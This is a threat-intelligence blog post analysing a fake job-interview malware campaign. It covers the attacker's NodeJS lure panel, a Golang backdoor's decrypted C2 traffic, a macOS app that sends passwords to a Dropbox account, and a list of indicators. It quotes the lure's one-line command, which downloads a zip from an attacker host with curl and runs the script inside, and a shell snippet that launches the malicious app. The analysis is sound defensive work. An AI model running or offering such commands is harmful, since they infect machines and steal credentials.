By: Jason Reaves and Joshua Platt
Recently a few articles have come out talking about new malware that people are associating with Contagious Interview[1,2] activity. The activity described[3,4] appears to take some tactics from recent cybercrime campaigns such as ClickFix[6]. According to twitter posts the threat actors will use messaging services on sites such as LinkedIn in order to facilitate the process of conducting bogus interviews:
Ref: https://x.com/tayvano_/status/1872980013542457802Once you start interacting with the site you are already in TA infrastructure, the site is a NodeJS panel that will throw a fake error message involving the camera.
"className=\"text-red-400 font-semibold\">Access to your camera or microphone is currently blocked.</p>\r\n <p className=\"text-gray-500 mt-2\">\r\n The camera discovery cache is experiencing a race condition. This may lead to inconsistent data.\r\n <a className = 'text-blue-500 mx-2 underline text-lg' href = {`${os == \"Windows\" ? The panel has references to google forms but also POSTs off data:
" const response = await axios.post('hxxps://api.nvidia-drive[.]cloud/submit', {...formData});\r\"These sites seem to go down pretty commonly but a new one at the time of writing can be found here:
app.quickvidintro.com/invite/advisor
Inside the panel code we can find multiple invite links:
{path:"/invite/halliday",element:(0,Ft.jsx)(Ci,{})},{path:"/invite/tforce",element:(0,Ft.jsx)(Li,{})},{path:"/invite/dep10mk",element:(0,Ft.jsx)(Ii,{})},{path:"/invite/wdl101",element:(0,Ft.jsx)(Gi,{})},{path:"/invite/deny01os",element:(0,Ft.jsx)(Bi,{})},{path:"/invite/ip8k001lk3",element:(0,Ft.jsx)(Vi,{})},{path:"/invite/ddk2fo013",element:(0,Ft.jsx)(sl,{})},{path:"/invite/Awe15pq",element:(0,Ft.jsx)(fi,{})},{path:"/invite/Awe15h2",element:(0,Ft.jsx)(yi,{})},{path:"/invite/Awe15h3",element:(0,Ft.jsx)(Uo,{})},{path:"/invite/Awe15h4",element:(0,Ft.jsx)($o,{})},{path:"/video-questions/create/owl92ufnm38048c3bb7261efd5kklp09",element:(0,Ft.jsx)(Os,{})},{path:"/video-questions/create/0893jflei910c41a4b4da92569330lm00",element:(0,Ft.jsx)(Cs,{})},{path:"/video-questions/create/wwo92mwpq4oe946d6904478f15d3e7iiw",A new location to download the zip for:
<Code>\r\n curl -k -o \"%TEMP%\\nvidiaupdate.zip\" hxxps://api.camera-drive[.org/nvidia-al.update && powershell -Command \"Expand-Archive -Force -Path '%TEMP%\\nvidiaupdate.zip' -DestinationPath '%TEMP%\\nvidiadrive'\" && wscript \"%TEMP%\\nvidiadrive\\update.vbs\"\r\n </Code>
Ultimately the script that is downloaded and ran will download a zip package that contains multiple pieces of malware, the package contains a backdoor with stealer functionality that was recently discussed in a blog[3]. The only piece not really discussed in the blog on this part is the C2 communications, which may not mean much considering the source code is present:
>>> data = binascii.unhexlify('a873df0f8acfbbec510afe2b80fd972326fd8f98eb2b5f6dc8cd67fd97142b55cad448f4b663867bc7db5524601f5cb0985456c9bc18c1016040f14dfc234d37782857cef160912aad28f4e83969b1701651af0243b8dab5b7f49f567b36bf8bccd40e9a9e8b28527df6674ff7a9c8e62a716d526ce71de7d3956c3d4770ed801a033439608c9f0f7ccb3bd10f79e7af2edd42d9b265e7f6f98fe20b87bb66f7e74b86cb72bfe9fac5508457e47b308ca26b5701adc826b9b7df94dbedb0256fed8b439cdeb832a36384210672a760fff72f14c0d1132dce70be5e0af3c0a36e7ff2def63aa68ecc88a7')
>>> key = data[16:16+128]
>>> rc4 = ARC4.new(key)
>>> t = rc4.decrypt(data[16+128:])
>>> t
b'14610ebd ZndlOQ== cm9vdA== QnJ1bm9zLVZpcnR1YWwtTWFjaGluZS5sb2NhbA== ZGFyd2lu YXJtNjQ= Mi4w'
>>> t = t.split(b' ')
>>> t = t[1:]
>>> [print(x) for x in map(base64.b64decode,t)]
b'fwe9'
b'root'
b'Brunos-Virtual-Machine.local'
b'darwin'
b'arm64'
b'2.0'
[None, None, None, None, None, None]Alert App
The tactic of spreading your malware by sending out the source code with a compiler on board is interesting, possibly a way to bypass security solutions. Also on board is a macho file which is detonated by the script:
APP="ChromeUpdateAlert.app"
# Step 5: Run ChromeUpdateAlert.app
if [[ -d "$WORK_DIR/$APP" ]]; then
open "$WORK_DIR/$APP" &
fi
The app was talked about in the same blog but I decided to go through it a bit closer statically because it does appear to use Dropbox API[5] and have functionality for exfiltration. It looks like it will ask for your password, something fairly common in setup installation.
It will also use a refresh_token, client_id and client_secret hidden in the application to get a Bearer token to upload files to the TAs Dropbox app:
The refresh_token used:
The other values are loaded dynamically:
With these values you can get a Bearer token and use that to interact with the file API for uploading off the password to the TA controlled Dropbox App.
IOCs
nvidia-drive[.]cloud
nvidia-cloud[.]online
nvidia-release[.]org
camera-drive[.]cloud
camera-drive[.org
api.jz-aws[.]info
216.74.123.191
95.169.180.146
zoom.callservice[.us
willointerview[.com
willo-interview[.]us
hiring-interview[.]com
blockchain-checkup.]com
blockchain-assess[.com
digitpotalent.]com
wtalents[.in
quickvidintro[.com
vidintroexam[.com
References
1: https://unit42.paloaltonetworks.com/two-campaigns-by-north-korea-bad-actors-target-job-hunters/
2: https://www.group-ib.com/blog/apt-lazarus-python-scripts/
3: https://dmpdump.github.io/posts/NorthKorea_Backdoor_Stealer/
4: https://x.com/tayvano_/status/1872980013542457802
5: https://www.dropbox.com/developers/documentation/http/documentation#oauth2-token
Golang backdoor with a side of ChromeUpdateAlert App was originally published in Walmart Global Tech Blog on Medium, where people are continuing the conversation by highlighting and responding to this story.
Introduction to Malware Binary Triage (IMBT) Course
Looking to level up your skills? Get 10% off using coupon code: MWNEWS10 for any flavor.
Enroll Now and Save 10%: Coupon Code MWNEWS10
Note: Affiliate link – your enrollment helps support this platform at no extra cost to you.
Article Link: Golang backdoor with a side of ChromeUpdateAlert App | by Jason Reaves | Walmart Global Tech Blog | Mar, 2025 | Medium